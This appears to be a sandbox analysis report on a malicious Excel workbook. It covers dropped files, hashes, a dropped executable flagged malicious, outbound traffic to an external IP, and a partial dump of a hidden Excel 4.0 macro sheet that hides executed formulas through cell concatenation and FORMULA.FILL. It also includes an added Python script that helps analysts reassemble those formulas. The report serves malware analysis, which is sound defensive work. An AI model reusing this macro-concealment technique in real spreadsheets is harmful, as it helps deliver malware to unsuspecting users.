          Preview: MSCF............,...................I........d.........R9b .authroot.stl.3..).4..CK..8T....c_.d....A.K...].M$[v.4.)7-.%.QIR..$t)Kd.-[..T\{..ne.....{..<.......Ab.<..X....sb.....e........dbu.3...0........X..00&Z....C...p0.}..2..0m.}..Cj.9U..J.j.Y...#.L..\X..O.,...,.qu..]..(B.nE~Q...)..Gcx.....}...f....zw.a..9+[.<0.'..2 .s..ya..J......wd....OO!.s....`.WA...F6._f....6...g..2..7.$,....X.k..&...E...g.....>uv."..!......xc......C..?....P0$.Y..?u....Z0.g3.>W0&.y.(....].`>... ..R.q..wg*X......qB!.B....Z.4..>.R.M..0.8...=.8..Ya.s.......add..)..w.4.&.z...2.&74.5]..w.j.._iK..||[.w.M.!<-.}%.C<tDX5\s._..I..*..nb.....GCQ.V..r..Y.............q...0..V)Tu>.Z..r...I...<.R{Ac..x^. .<A........|.{.....Q...&....X..C$....e9.:..vI..x.R4...L......%g...<..}'{....E8Sl...E".h...*.........ItVs.K......3.9.l..`D..e.i`....y...,..5....aSs`..W...d...t.J..]....'u3..d]7..=e....[R!:........Q.%..@........ga.v.~..q....{.!N.b]x..Zx.../;#}.f.)k.c9..{rmPt..z5.m=..q..%.D#<+Ex....1|.._F.
          C:\Users\user\AppData\Local\Temp\F6DE0000
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):68561
          Entropy (8bit):7.608770850697448
          Encrypted:false
          SSDEEP:1536:m+yXkNLPHqvAk/Vi6+YDT7Hbc8hxCCV25Z:m+yUNLP4lA6+YHcId25Z
          MD5:B67C936515D2A419269AB8E2D93204DE
          SHA1:44331DB15B55BAD0D97DEFE091ACF39EE39248A3
          SHA-256:E933C429EFC848987756125BFE9C3AB422F5E2EFCAEF5F945718AC31F90C9658
          SHA-512:6B3D48B0153F8AC2D2AC7A4FB9462E145321D13AFD8C9284A94837DC5108FD55998CA902B7FD8EC83A8549F5A0B3B8CA4C7B951818AE04B03CF578BC3F5DA210
          Malicious:false
          Reputation:low
          Preview: .TKo.0.....0t-l.=.....>.].u?...X.^..6....4k. ^.^l... %rz.r.y.D&.^.w..WA........h(..`..^........:"5...!..CJR.:..D..... .gZ..j......7....s....M.q.O677+..q.'.B4W..E........1.-.a Fk.d.N>{.....Y..`"..uqX.D.z+....r&........u...%..c...8Iq..B...;.*.....9..:<.T.$...?$..Y..s.P.....:..AW2g..I]....O5....zD&.CY.....R^[.O..tLy...WN..n.-.....X.....%:...>.H<>..^..^/.62..lp..zi..]~..^.a.n...mY.../.......PK..........!...<............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0...H.C...nH....
          C:\Users\user\AppData\Local\Temp\TarE005.tmp
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):156885
          Entropy (8bit):6.30972017530066
          Encrypted:false
          SSDEEP:1536:NlR6c79JjgCyrYBWsWimp4Ydm6Caku2SWsz0OD8reJgMnl3XlMuGmO:N2UJcCyZfdmoku2SL3kMnBGuzO
          MD5:9BE376D85B319264740EF583F548B72A
          SHA1:6C6416CBC51AAC89A21A529695A8FCD3AD5E6B85
          SHA-256:07FDF8BC502E6BB4CF6AE214694F45C54A53228FC2002B2F17C9A2EF64EB76F6
          SHA-512:8AFC5D0D046E8B410EC1D29E2E16FB00CD92F8822D678AA0EE2A57098E05F2A0E165858347F035AE593B62BF195802CB6F9A5F92670041E1828669987CEEC7DE
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview: 0..d...*.H.........d.0..d....1.0...`.H.e......0..T...+.....7.....T.0..T.0...+.....7........L.E*u...210519191503Z0...+......0..T.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Fri Jun 11 06:00:40 2021, atime=Fri Jun 11 06:00:40 2021, length=8192, window=hide
          Category:dropped
          Size (bytes):867
          Entropy (8bit):4.480521840960962
          Encrypted:false
          SSDEEP:12:85Q8LoLgXg/XAlCPCHaXtB8XzB/04uX+Wnicvb63+bDtZ3YilMMEpxRljKtTdJP8:85I/XTd6jJuYe4SDv3qArNru/
          MD5:D1901B672D68B95B87925635D8835BDF
          SHA1:3B0CAF79347B90E7F276CB084D1074E24599E8A2
          SHA-256:DB6552B4D3F6608CE90336C480BEC6C4E963B8815E377D16E895B186F040AA34
          SHA-512:83D9FFBF227CCBF7539E2DBFD061F446FD7107CDB06FF3967499214442C0EF4E1B23E50B481E85991ECFE0E794C73A8A4CF6DD71359C7B75BAEF747455BA0331
          Malicious:false
          Reputation:low
          Preview: L..................F...........7G...z=}.^...z=}.^... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R.8..Desktop.d......QK.X.R.8*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\067773\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......067773..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-47-2637.LNK
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Fri Jun 11 06:00:40 2021, atime=Fri Jun 11 06:00:40 2021, length=92672, window=hide
          Category:dropped
          Size (bytes):2088
          Entropy (8bit):4.536758685214297
          Encrypted:false
          SSDEEP:24:8i/XTd6jFyq4Me431Dv3qAdM7dD2i/XTd6jFyq4Me431Dv3qAdM7dV:8i/XT0jFB4MdEAQh2i/XT0jFB4MdEAQ/
          MD5:709594534DD8AAF9078F756A8817A71A
          SHA1:1FAF88E21AE6ED12EAE26EB687EEC62C97B6D7F2
          SHA-256:C411BE565BE4A1C8D52CB9FD1510C1CC565F34BCAE4385966579D84C325C74D1
          SHA-512:DF93EE96B3EC505691231141EBEF51DB12E8DB0CBC416584E27A8A4C4D9F31E181CC095F27FD21DB1CF709B0C8350CDB0867F3E9308DD3359890EF03010C8CB1
          Malicious:false
          Preview: L..................F.... ....}..{...z=}.^..E.G}.^...j...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2..h...R.8 .DOCUME~1.XLS..V.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.4.7.-.2.6.3.7...x.l.s.......~...............-...8...[............?J......C:\Users\..#...................\\067773\Users.user\Desktop\document-47-2637.xls.+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.4.7.-.2.6.3.7...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......067773..........D_....3N...W...9F.C....
          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):101
          Entropy (8bit):4.781102818999889
          Encrypted:false
          SSDEEP:3:oyBVomMY9LRkKSd6YCZELRkKSd6YCmMY9LRkKSd6YCv:dj6Y9LaJdzgELaJdzUY9LaJdzs
          MD5:CC574425794FB97F59C2DC249939493A
          SHA1:8CA2DFD4C2535E0FFEB160319D2CD079758B7F8D
          SHA-256:1D977854F9C0DDF7462B6991CA2B6026C4FFCAF52F158A2C7B81B8FBEE5E35F0
          SHA-512:6C9C7CAFA742354DB174653D4C1CF9521AC10C67177FB2E26A85AE1267F1A45094BD1F1AE3C0B53836D5210F6083906F17C26A28A197D0CCF2F76D7447272E43
          Malicious:false
          Preview: Desktop.LNK=0..[xls]..document-47-2637.LNK=0..document-47-2637.LNK=0..[xls]..document-47-2637.LNK=0..
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ZH9NG0C7.txt
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:ASCII text
          Category:downloaded
          Size (bytes):99
          Entropy (8bit):4.738309873166655
          Encrypted:false
          SSDEEP:3:12mZI6A3xQlGTKvUQ2NwS2TdeX3Rsa/n:8YIr3xUGZXN2TwXzn
          MD5:1013A2F28CACF36A2234BC56C8B76B40
          SHA1:25B9130C97E0351F0707D53C72E4E1C700C324BE
          SHA-256:4B034D46F013E42559260BD248B7B0011EE83AE4D836D14FB4083A3BE287C3D2
          SHA-512:F28E38E260D8F9B5ADC14C6F449299D6318268412C2BDC9616E46CD9C22AF6DD5546F4684F549EF2FA8B1AD00400370AD2C84BD9ED4DC6704427B7D4EC7ADE73
          Malicious:false
          IE Cache URL:webhub365.com/
          Preview: PHPSESSID.hodlph97qarho6n2q5ae7qthj6.webhub365.com/.1536.1170067456.30891789.2127077170.30891663.*.
          C:\Users\user\Desktop\774F0000
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:Applesoft BASIC program data, first line number 16
          Category:modified
          Size (bytes):99731
          Entropy (8bit):7.932017898229176
          Encrypted:false
          SSDEEP:3072:VKZ1QaE1iFKbbG46fQWnPdkuiZpKZ1SaE1/:VKZW9ocW46fjF8ZpKZ49l
          MD5:1C3608A1D6C608CAAB12624DE264B8DC
          SHA1:A83808D92C7633E5123DA9A49FA5F01F9836A256
          SHA-256:9ACD9A818075B4FA763A7B0328DB449DA693309C6EBE330B8C81F14BE566CD91
          SHA-512:4A407DA6AA2A6896391D8C967E18A516B01046D96E7A167A7EDBE4A0FBBCBC73407A72B82137452674142CDE33802B46E1081C0C5C769306736E8A9AAAADE46F
          Malicious:false
          Preview: ........g2........../.........X.:...5.IE..1`.3>...."n.^...}.6...Q.nKJD4.]..$.8........g2........../.6.......X.:...5.IE..1`.3>...."n.^...}.6...Q.nKJD4.]..$.8..........*U....\.p.p.h`.q._.C.%5R."h.sHV-....1......K.. ..<...7].1..s.Ye....bsn.....!..g.<.......$N*'.~..apH.z*\..A{./.97ViB....7a.........=............y.....@.....................a=....i..,....TC.....R@....'.....7"...z...................1.....d._..u.Db.R..h...o.1a9i.k..1...u.......@..O...B...$..3....1...).@q../Y.1...,...........u..1.....7.D.]...{...-.IGFB...e....1....L...C.D..:.i..$..f.:..U..1.*.P.'8 ..S.mX.S..XU...<'\e...Kl.>.j.q.p.0.1...........R._<@..s}..aw l.....1...l....S.[B...).....1 w.W.`.1.1.....r."aiE?D.Z..0i.}...V..C5.-.1......c.=>J.z....:.m.}.arH..!.1...[.....aB.F|S.....;."....W;b.1....=x......T.K...3,.PP..H..s..Y-1...i.%......w..o}.-....-..lj..5..1.......F3.. 4.....;...2;...x.s^.1...o......@.I.icN.{..M.".!b...1....P.r.r.'.G.H.......n...h...(6.1....=..V.2..........4.....iy..:F.1...
          C:\Users\user\Desktop\C7DE0000
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:Applesoft BASIC program data, first line number 16
          Category:dropped
          Size (bytes):117436
          Entropy (8bit):7.9268262065554325
          Encrypted:false
          SSDEEP:3072:M2hpEu0A4iQEmRqwJOu3J5Pn/cOGWJPn/cZGW02hpEA0w:V0tA4idvu3JRFBoN0/w
          MD5:388CD90E27FA7C09A02E5490E32F9408
          SHA1:0E61310B0D55D8C1E24DCBBC9CAA79874959E308
          SHA-256:EDA8CD37F5999158DCABBD39B4292FE7692163FBCEEB68AE1BDE1166D350564B
          SHA-512:6DA5A552A3ED2229C478AAE92AAAF5436B8F6D9C2DABFD580389DA3243B486C4B7EED5748C753D57123EF474455A77EA64373AC94EE2AEE24B5D872A6268BFAC
          Malicious:false
          Preview: ........g2........../..........._`........G4.'.3P_....P...@.......*]L..V.1........g2........../.6........._`........G4.'.3P_....P...@.......*]L..V.1...........T....\.p.S.T..~.\|.`..C.0.J....hN~..\x9:..;i..~.{.Ik.1...Z.\Q......!JG..HB....}.Mu...........i.>It.W........"T.......[A.B....xa....!....=...e\............^%..........:..........2m=.....Y..) .\.q.V...j.@....>....."...*.....v3....ly......1...2....%i...J..F.:y.z....B...X.1......Bzme....Db.mD..i......D..1.......Wi^..r..B........h..Bp1...]*...gF.>. .....:9.I:U...\.1....u...c.....L......-.......b1.*.._l..|..o....7..`y....e_.*:*..i..<o.>|1...S....~....7".5A&.I.$..p..v...1.....A0.....>.Vs.....3.z2...9.L1......q.Q...=...Bz....N.$..g.Wl.1......Km.9......f..n.Q..}.&?)61.....E_..8E.-..4m).A)..H....O%1.....r...zA.s.....Nd..}.mj....q1...<.R.*..{.#...%....\Cc...?....1...e....C..O_....M.Ybz..>.SIX51......n[....$...!....z\{D>?Hx...1......ow.;xg'M......y].L.|..3.1...Mp.BX."K.p.c.?.ojj..T.v|}?f..1...
          C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
          Process:C:\Windows\System32\cmd.exe
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):25600
          Entropy (8bit):5.584698658834256
          Encrypted:false
          SSDEEP:384:zKIhxI3PKZ/COyNcx5GTyoNr9MUVO9FvB3RH++x5XrIQP8S8cB5vWMiG:zKIhxI3PKZ/bIaqyCrXV+v1NrnLB5X
          MD5:7F7F391491C315A4A72EFCAC0D34FA93
          SHA1:20A18C7EA14F4E1D3044091B46D6E862B6F38708
          SHA-256:022577F47FB074B7D942C8F01DAAC778B110A373DE03B3B5043E887995B09D52
          SHA-512:78D39D7FD02D4F6CA0E13D0EACADC842D5A104C31342202875F84A69C310ECF6D4DCC8F00E95B09DE936922BE0312CF956C5E955254A99113EFB3F51E26C082E
          Malicious:true
          Antivirus:
          • Antivirus: Virustotal, Detection: 0%
          • Antivirus: Metadefender, Detection: 2%
          • Antivirus: ReversingLabs, Detection: 0%
          Joe Sandbox View:
          • Filename: document-47-2637.xls, Detection: malicious
          • Filename: document-37-1849.xls, Detection: malicious
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.].*.3.*.3.*.3..)..+.3..)..).3..)..>.3..)..%.3.*.2.V.3..)..9.3..)..+.3..)..+.3.Rich*.3.........PE..L...-.[R.................B...$.......J.......`....@.................................k.....@...... ..........................$q......................................0...............................h!..@............p..$............................text...|A.......B.................. ..`.data........`.......F..............@....idata..6....p.......H..............@..@.rsrc................P..............@..@.reloc...............Z..............@..B........................................................................................................................................................................................................................................................................................................................................

          Static File Info

          General

          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Windows User, Last Saved By: Windows User, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jun 2 14:40:34 2021, Last Saved Time/Date: Wed Jun 2 14:40:36 2021, Security: 1
          Entropy (8bit):7.59086745125602
          TrID:
          • Microsoft Excel sheet (30009/1) 78.94%
          • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
          File name:document-47-2637.xls
          File size:92165
          MD5:92dcc47a1a044fc3a2328ec6eef3918b
          SHA1:6f9266a6c0b702cbaa0a3583df5c8cd1357eae35
          SHA256:ac4b99079b1ceb11db593097e421de9d9092765feedc23a3ab8ef912b292c988
          SHA512:fcd4b7c0a4e0f785604f40e0a9a4690e9b642223ee63088c6c4acfc262a18f5a79c77ab82498b422b229eaecc9a2e745b7e455c43ad2a85794e7adbac6b9bafd
          SSDEEP:1536:Lc2ZSmXWCQnp2c90Hg+j8z3kVfKIDVzoFGUslIB54N+wl8MYBzaVt4J5aukGqu:LXZxXTQ8hHgNQNeF3V4NvuhBzaV+J5a+
          File Content Preview:........................>......................................................................................................................................................................................................................................

          File Icon

          Icon Hash:e4eea286a4b4bcb4

          Static OLE Info

          General

          Document Type:OLE
          Number of OLE Files:1

          OLE File "document-47-2637.xls"

          Indicators

          Has Summary Info:True
          Application Name:Microsoft Excel
          Encrypted Document:True
          Contains Word Document Stream:False
          Contains Workbook/Book Stream:True
          Contains PowerPoint Document Stream:False
          Contains Visio Document Stream:False
          Contains ObjectPool Stream:
          Flash Objects Count:
          Contains VBA Macros:False

          Summary

          Code Page:1252
          Author:Windows User
          Last Saved By:Windows User
          Create Time:2021-06-02 13:40:34
          Last Saved Time:2021-06-02 13:40:36
          Creating Application:Microsoft Excel
          Security:1

          Document Summary

          Document Code Page:1252
          Thumbnail Scaling Desired:False
          Company:
          Contains Dirty Links:False
          Shared Document:False
          Changed Hyperlinks:False
          Application Version:983040

          Streams

          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
          General
          Stream Path:\x5DocumentSummaryInformation
          File Type:data
          Stream Size:4096
          Entropy:0.308022095077
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . i . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a5 00 00 00
          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
          General
          Stream Path:\x5SummaryInformation
          File Type:data
          Stream Size:4096
          Entropy:0.316312415339
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W i n d o w s U s e r . . . . . . . . . . . . W i n d o w s U s e r . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . W . . @ . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 b0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 60 00 00 00 12 00 00 00 78 00 00 00 0c 00 00 00 90 00 00 00 0d 00 00 00 9c 00 00 00 13 00 00 00 a8 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 10 00 00 00
          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 81910
          General
          Stream Path:Workbook
          File Type:Applesoft BASIC program data, first line number 16
          Stream Size:81910
          Entropy:7.97723236264
          Base64 Encoded:True
          Data ASCII:. . . . . . . . T 8 . . . . . . . . . . / . 6 . . . . . . . . j . . . _ . W > N . B . . [ . . . . . . D . G . . . . 9 s < D l . o . b . 3 . ^ K W . ~ . U . . . . . . . . . . . h . . . . . \\ . p . i . . v . / . . . . B . 7 r . n . S . $ . 4 f . 7 . U . . e . Y k . . . L Q . . o N . . . . $ a . 7 Q . . . u . s . X U . ^ . . . . . . K . C d . . . l . ? . & . C . . . . . . . . v . . . . . 4 ; / . . . . 6 4 = . . . . . . B . . . . I a . . . . D . . . . = . . . . # . c . . . . h . . . . . s R . . . . . . . . . .
          Data Raw:09 08 10 00 00 06 05 00 54 38 cd 07 c1 c0 01 00 06 07 00 00 2f 00 36 00 01 00 01 00 01 00 02 6a df 82 8f 5f f7 57 3e 4e 18 42 a0 92 5b 1d e8 95 bd ea b2 44 89 47 13 ad c8 06 39 73 3c 44 6c 0c 6f cd 62 dc 33 7f 5e 4b 57 2e 7e e6 55 cf e1 00 02 00 b0 04 c1 00 02 00 68 a6 e2 00 00 00 5c 00 70 00 69 b6 c9 76 af 2f 14 b1 ed d6 42 f4 37 72 10 6e cc 53 fc 24 ef 34 66 18 37 82 55 80 f5 65

          Macro 4.0 Code

          The hidden macro sheet, dumped as CSV with one comma per empty cell. Cell addresses are not preserved in the dump, so the non-empty cells are listed here in sheet order. Each group first assigns the name mxUXwaSU to a concatenation of cell references (the string being assembled) and the name id9nB5my to a single destination cell, then calls the routine at $F$105 and finally RUNs a cell. The only RETURN in the dump, =RETURN(FORMULA.FILL(mxUXwaSU,id9nB5my)), writes the assembled string into the destination cell as a formula, which is why the executed code is never present in the sheet as a plain formula. Single-character cells are listed as fragments.

          Fragments: ! l ? L ! x 5
          mxUXwaSU= $N$84&$X$102&$K$324&$C$460&$M$83&$K$324&$N$447&$I$336&$X$102&$K$324&$X$82&$M$83&$U$271&$X$102&$V$246&$X$462
          id9nB5my= $W$367
          =$F$105()
          =RUN($K$351)
          Fragments: M s
          mxUXwaSU= $H$409&$H$409&$N$84&$N$84&$N$84&$N$84&$H$409
          id9nB5my= $Y$71
          =$F$105()
          =RUN($I$385)
          Fragments: 3 \ Z c t C ! r
          =RETURN(FORMULA.FILL(mxUXwaSU,id9nB5my))
          Fragments: d q / F I n 6 E
          mxUXwaSU= $F$204&$H$481&$K$324&$N$11&$N$11&$E$78&$I$228
          id9nB5my= $D$167
          =$F$105()
          =RUN($R$247)
          Fragments: !
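          The dump above is the macro sheet flattened to CSV. The script below is an added example, not part of the sandbox report or of the sample: it walks such a dump, keeps the non-empty cells with their addresses, and separates the string-building name assignments (mxUXwaSU=...&...), the destination-cell assignments (id9nB5my=$W$367), the =$F$105() calls, the =RUN(...) steps and the FORMULA.FILL return, so an analyst knows which cells to extract from the workbook to reassemble the hidden formulas. The CSV embedded in it is constructed for the example: the formulas are the ones visible above, the cell positions are invented because the page's dump does not preserve them.

```python
import csv
import io
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed CSV in the same dump style as the "Macro 4.0 Code" section above: one field
# per cell, empty fields for empty cells. The formulas are the ones visible on the page;
# the row/column positions are invented, since the page's dump does not preserve them.
SAMPLE_CSV = """\
,!,,,
,,l,,
,,mxUXwaSU= $N$84&$X$102&$K$324&$C$460&$M$83&$K$324&$N$447&$I$336&$X$102&$K$324&$X$82&$M$83&$U$271&$X$102&$V$246&$X$462,,
,,id9nB5my= $W$367,,
,,=$F$105(),,
,,=RUN($K$351),,
,,mxUXwaSU= $H$409&$H$409&$N$84&$N$84&$N$84&$N$84&$H$409,,
,,id9nB5my= $Y$71,,
,,=$F$105(),,
,,=RUN($I$385),,
,,,"=RETURN(FORMULA.FILL(mxUXwaSU,id9nB5my))",
,,mxUXwaSU= $F$204&$H$481&$K$324&$N$11&$N$11&$E$78&$I$228,,
,,id9nB5my= $D$167,,
,,=$F$105(),,
,,=RUN($R$247),,
"""

ABS_REF = re.compile(r"\$[A-Z]{1,3}\$\d+")
RUN_CALL = re.compile(r"^=RUN\((\$[A-Z]{1,3}\$\d+)\)$")
CELL_CALL = re.compile(r"^=(\$[A-Z]{1,3}\$\d+)\(\)$")
NAME_ASSIGN = re.compile(r"^([A-Za-z_]\w*)\s*=\s*(.+)$")   # XLM "name=expr" defines a name


def col_letters(index: int) -> str:
    """0-based column index to spreadsheet letters: 0 -> A, 25 -> Z, 26 -> AA."""
    letters = ""
    index += 1
    while index:
        index, rem = divmod(index - 1, 26)
        letters = chr(ord("A") + rem) + letters
    return letters


def parse_xlm_csv(text: str) -> Dict[str, str]:
    """Non-empty cells as {address: content}, in row-major sheet order."""
    cells: Dict[str, str] = {}
    for row_no, row in enumerate(csv.reader(io.StringIO(text)), start=1):
        for col_no, value in enumerate(row):
            if value.strip():
                cells[f"{col_letters(col_no)}{row_no}"] = value.strip()
    return cells


@dataclass
class Step:
    cell: str
    kind: str                        # set-name | call | run | return | fragment
    expr: str = ""
    name: str = ""
    refs: List[str] = field(default_factory=list)
    target: str = ""


def classify(cell: str, content: str) -> Step:
    """Order matters: formulas start with '=', so they are tested before name assignments."""
    m = RUN_CALL.match(content)
    if m:
        return Step(cell, "run", content, target=m.group(1))
    m = CELL_CALL.match(content)
    if m:
        return Step(cell, "call", content, target=m.group(1))
    if content.startswith("=RETURN("):
        return Step(cell, "return", content, refs=ABS_REF.findall(content))
    m = NAME_ASSIGN.match(content)
    if m:
        return Step(cell, "set-name", m.group(2), name=m.group(1), refs=ABS_REF.findall(m.group(2)))
    return Step(cell, "fragment", content)


def triage(text: str) -> List[Step]:
    return [classify(cell, content) for cell, content in parse_xlm_csv(text).items()]


def run_targets(steps: List[Step]) -> List[str]:
    """Cells handed to =RUN(): where control goes after each FORMULA.FILL."""
    return [s.target for s in steps if s.kind == "run"]


def fill_destinations(steps: List[Step]) -> List[str]:
    """Single-cell name assignments: the cells FORMULA.FILL writes the assembled formula into."""
    return [s.refs[0] for s in steps
            if s.kind == "set-name" and "&" not in s.expr and len(s.refs) == 1]


def cells_to_dump(steps: List[Step]) -> List[str]:
    """Every cell read by a concatenation: extract these to reassemble the hidden formulas."""
    wanted = set()
    for s in steps:
        if s.kind == "set-name" and "&" in s.expr:
            wanted.update(s.refs)
    return sorted(wanted, key=lambda r: (r.split("$")[1], int(r.split("$")[2])))


def uses_formula_fill(steps: List[Step]) -> bool:
    return any(s.kind == "return" and "FORMULA.FILL(" in s.expr for s in steps)


if __name__ == "__main__":
    steps = triage(SAMPLE_CSV)
    for s in steps:
        print(f"{s.cell:>6}  {s.kind:<9} {s.expr}")
    print("RUN targets:", run_targets(steps))
    print("FORMULA.FILL destinations:", fill_destinations(steps))
    print("Cells to dump:", ", ".join(cells_to_dump(steps)))
```

          The output of cells_to_dump is the list to feed back into the workbook (for instance with an XLS parser that exposes cell values of hidden sheets): once those cells' contents are known, each mxUXwaSU concatenation can be evaluated by hand and the formula that lands in $W$367, $Y$71 and $D$167 read directly.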

          Network Behavior

          Network Port Distribution

          TCP Packets

          Timestamp                             Src Port  Dst Port  Source IP       Dest IP
          Jun 11, 2021 00:01:02.782792091 CEST  49167     443       192.168.2.22    198.244.146.96
          Jun 11, 2021 00:01:02.840646982 CEST  443       49167     198.244.146.96  192.168.2.22
          Jun 11, 2021 00:01:02.840765953 CEST  49167     443       192.168.2.22    198.244.146.96
          Jun 11, 2021 00:01:02.850260973 CEST  49167     443       192.168.2.22    198.244.146.96
          Jun 11, 2021 00:01:02.906337976 CEST  443       49167     198.244.146.96  192.168.2.22
          Jun 11, 2021 00:01:02.907385111 CEST  443       49167     198.244.146.96  192.168.2.22
          Jun 11, 2021 00:01:02.907407999 CEST  443       49167     198.244.146.96  192.168.2.22
          Jun 11, 2021 00:01:02.907428980 CEST  443       49167     198.244.146.96  192.168.2.22
          Jun 11, 2021 00:01:02.907445908 CEST  443       49167     198.244.146.96  192.168.2.22
          Jun 11, 2021 00:01:02.907556057 CEST  49167     443       192.168.2.22    198.244.146.96
          Jun 11, 2021 00:01:02.909708023 CEST  49167     443       192.168.2.22    198.244.146.96
          Jun 11, 2021 00:01:02.911695957 CEST  443       49167     198.244.146.96  192.168.2.22
          Jun 11, 2021 00:01:02.911792994 CEST  49167     443       192.168.2.22    198.244.146.96
